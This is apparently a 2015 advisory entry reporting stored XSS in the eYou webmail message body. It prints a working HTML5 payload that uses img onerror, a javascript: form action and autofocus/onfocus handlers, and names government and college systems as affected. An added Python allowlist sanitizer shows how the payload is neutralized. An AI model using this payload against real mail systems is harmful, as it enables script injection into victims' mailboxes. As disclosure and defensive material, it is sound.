eYou mail system: stored XSS in the message body (HTML5 features, some requiring a click)

2015-02-14T00:00:00
ID MYHACK58:62201559111
Type myhack58
Reporter Anonymous
Modified 2015-02-14T00:00:00

Description

Because eYou versions differ, the effect of the test code below varies slightly from one installation to another, but the cause of the vulnerability is the same.

Test code:

<!-- [if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>

After the message is sent and opened, the effect is as shown.

A government e-mail system:


A college's e-mail system:


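A defensive counterpart to the test code above, as an added example that is not part of the original advisory and is not eYou's code: an allowlist sanitizer for HTML message bodies, run against the advisory's test string. The allowlists and the names `sanitize`, `safe_url` and `MailBodySanitizer` are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist for a webmail body view; these sets are not taken from eYou.
ALLOWED_TAGS = {"a", "b", "br", "div", "em", "i", "img", "li", "ol", "p", "span", "strong", "ul"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
SAFE_SCHEMES = {"http", "https", "mailto", "cid"}
# The advisory's test code, unchanged.
POC = ("<!-- [if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)>"
       "<input type=submit><input autofocus onfocus=alert(3)>"
       "<select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>")

def safe_url(value):  # only absolute URLs with an allowlisted scheme pass
    try:
        return urlsplit(value.strip()).scheme in SAFE_SCHEMES
    except ValueError:  # malformed URL, e.g. an unterminated IPv6 literal
        return False

class MailBodySanitizer(HTMLParser):
    """Re-emit allowlisted tags and attributes only; comments use the no-op default."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drops form, input, select and textarea from the test code
        kept = ""
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops on* handlers, autofocus, action, ...
            if name in ("href", "src") and not safe_url(value):
                continue  # drops javascript:, data: and scheme-less values
            kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))

def sanitize(body):
    parser = MailBodySanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)
```

Because the output is rebuilt from parsed tokens rather than filtered with pattern matching, the conditional-comment wrapper and the `autofocus`/`onfocus` pairs never reach the rendered message.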